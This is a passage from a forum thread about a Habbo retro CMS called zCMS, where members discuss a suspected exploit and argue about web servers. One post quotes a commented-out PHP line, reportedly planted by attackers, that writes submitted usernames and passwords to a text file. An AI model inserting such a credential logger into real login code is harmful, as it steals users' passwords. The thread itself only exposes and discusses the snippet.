zCMS article.php exploit fix!

Page 2 of 3 FirstFirst 123 LastLast
Results 16 to 30 of 34
  1. #16
    Account Upgraded | Title Enabled! Muscab is offline
    MemberRank
    Oct 2009 Join Date
    264Posts

    Re: zCMS article.php exploit fix?

    Quote Originally Posted by JimJam32 View Post
    The exact reason why I completely disrecommened anything that claims to be "secure".

    And I had some respect for Jonty, I have little now.
    If he is going to release something that he calls "secure", then why add in some kiddy exploits?

    Jesus christ.
    It's commented out :S

  2. #17
    "(still lacks brains)" NoBrain is offline
    MemberRank
    Sep 2011 Join Date
    United KingdomLocation
    2,658Posts

    Re: zCMS article.php exploit fix?

    Quote Originally Posted by JimJam32 View Post
    The exact reason why I completely disrecommened anything that claims to be "secure".

    And I had some respect for Jonty, I have little now.
    If he is going to release something that he calls "secure", then why add in some kiddy exploits?

    Jesus christ.
    I always triple check things before using them, incase they are extremely insecure.


    Quote Originally Posted by Muscab View Post
    It's commented out :S
    It's completely unnecessary and it should even be their!

  3. #18
    Account Upgraded | Title Enabled! iPukeEVO is offline
    MemberRank
    Aug 2011 Join Date
    Freeport,BahamaLocation
    335Posts

    Re: zCMS article.php exploit fix!

    Thank You.
    Exploits!

  4. #19
    "(still lacks brains)" NoBrain is offline
    MemberRank
    Sep 2011 Join Date
    United KingdomLocation
    2,658Posts

    Re: zCMS article.php exploit fix!

    To help Habbo Retros even further, I am designing and coding a Webserver with top notch security, and also a version for developers.

    Live Version
    nginx
    PHP
    MySQL
    phpMyAdmin

    Developer Version
    Apache
    PHP
    MySQL
    phpMyAdmin

    Screenshot(s)

  5. #20
    sexiess is a sin. Subway is offline
    MemberRank
    Jun 2010 Join Date
    2,491Posts
    nice find!
    Posted via Mobile Device

  6. #21
    Account Upgraded | Title Enabled! Grant is offline
    MemberRank
    Sep 2009 Join Date
    Scotland, UK.Location
    728Posts

    Re: zCMS article.php exploit fix!

    I don't see why it should matter, yes it shouldn't be their, but it's commented out. Anyway's, I know a couple of these CMS releases have contained that piece of code. Look back to around 2 months after uberCMS's released, 'ItzJay' (I think) released a notice stating that the password logging was in the CMS.

    Maybe Jonty hasn't checked that .php file?

  7. #22
    prjRev.com Kryptos is offline
    MemberRank
    Feb 2010 Join Date
    Planet EarthLocation
    579Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Jupos View Post
    To help Habbo Retros even further, I am designing and coding a Webserver with top notch security, and also a version for developers.

    Live Version
    nginx
    PHP
    MySQL
    phpMyAdmin

    Developer Version
    Apache
    PHP
    MySQL
    phpMyAdmin

    Screenshot(s)
    I rather use IIS.

  8. #23
    No, Just no. Matthew is offline
    MemberRank
    Jul 2008 Join Date
    United KingdomLocation
    1,408Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Kryptos View Post
    I rather use IIS.
    IIS has no gain over Apache when it comes to PHP. Infact, Apache is much more extensive and supported. Sure, you can run PHP on IIS. However the logic is simple, IIS for ASP, Apache for PHP.

    There's a common misconception in the habboon community, and that's that Apache is not secure. When all they've used is the XAMPP version of it, which, of course is for developmental purposes. Apache is very secure, fast and efficient if set up correctly and has the correct modules loaded. I've personally had exceptional results with Apache and PHP + APC.

    However this community is plagued with laziness and unwillingness. So, every one will stick with IIS 'cuz some 13 year old with a windows VPS says its secure.

    Not saying any of that applies to you; just thought I'd throw that out there.

  9. #24
    :joy: Jonteh is offline
    MemberRank
    Apr 2007 Join Date
    New York, USALocation
    3,375Posts

    Re: zCMS article.php exploit fix?

    Quote Originally Posted by Jupos View Post
    I fail at spotting sarcasm, sorry XD

    EDIT: Jonty, wtf were you thinking O.o

    PHP Code:
    // fwrite( fopen('./images/lol.txt', 'a+'), $_POST['credentials_username']." > ".mysql_real_escape_string($_POST['credentials_password'].chr(13))); exit; 
    Zap got hacked around 7 months ago and that code was placed into our index to log our passwords, I commented it out and kept it there for future reference.

  10. #25
    prjRev.com Kryptos is offline
    MemberRank
    Feb 2010 Join Date
    Planet EarthLocation
    579Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Matthew View Post
    IIS has no gain over Apache when it comes to PHP. Infact, Apache is much more extensive and supported. Sure, you can run PHP on IIS. However the logic is simple, IIS for ASP, Apache for PHP.

    There's a common misconception in the habboon community, and that's that Apache is not secure. When all they've used is the XAMPP version of it, which, of course is for developmental purposes. Apache is very secure, fast and efficient if set up correctly and has the correct modules loaded. I've personally had exceptional results with Apache and PHP + APC.

    However this community is plagued with laziness and unwillingness. So, every one will stick with IIS 'cuz some 13 year old with a windows VPS says its secure.

    Not saying any of that applies to you; just thought I'd throw that out there.
    Not really meaning that IIS is the best option, my point is that it's way better to use something like IIS than using some 'Webserver' with 'top-notch security'(?lol?) from someone in /f282

  11. #26
    :joy: Jonteh is offline
    MemberRank
    Apr 2007 Join Date
    New York, USALocation
    3,375Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Kryptos View Post
    Not really meaning that IIS is the best option, my point is that it's way better to use something like IIS than using some 'Webserver' with 'top-notch security'(?lol?) from someone in /f282
    Yeah, and when the one hes 'developing' doesn't have any code, just Form1.design, which indicates to me it's a fake development.

    meh.

  12. #27
    The one and only! Hejula is offline
    MemberRank
    Nov 2008 Join Date
    4,128Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Jonteh View Post
    Yeah, and when the one hes 'developing' doesn't have any code, just Form1.design, which indicates to me it's a fake development.

    meh.
    He hasnt double clicked on Form1 and showed everyone so you dont know if there is code or not.

  13. #28
    "(still lacks brains)" NoBrain is offline
    MemberRank
    Sep 2011 Join Date
    United KingdomLocation
    2,658Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Hejula View Post
    He hasnt double clicked on Form1 and showed everyone so you dont know if there is code or not.
    I posted that screenshot when I was just starting to develop it, right now their is very little code because Visual C# keeps fucking crashing on me -.-


    Quote Originally Posted by Jonteh View Post
    Yeah, and when the one hes 'developing' doesn't have any code, just Form1.design, which indicates to me it's a fake development.

    meh.
    1 little thing, how is it a fake development when I haven't even posted a development thread O.o

  14. #29
    sexiess is a sin. Subway is offline
    MemberRank
    Jun 2010 Join Date
    2,491Posts

    Re: zCMS article.php exploit fix!

    Nice rip from Jessy @ 0taku.

  15. #30
    Live Ocottish Sverlord Joopie is offline
    LegendRank
    Jun 2010 Join Date
    The NetherlandsLocation
    2,773Posts

    Re: zCMS article.php exploit fix!

    Quote Originally Posted by Subway View Post
    Nice rip from Jessy @ 0taku.
    Didn't expected it form you to bump ;x



Page 2 of 3 FirstFirst 123 LastLast

Advertisement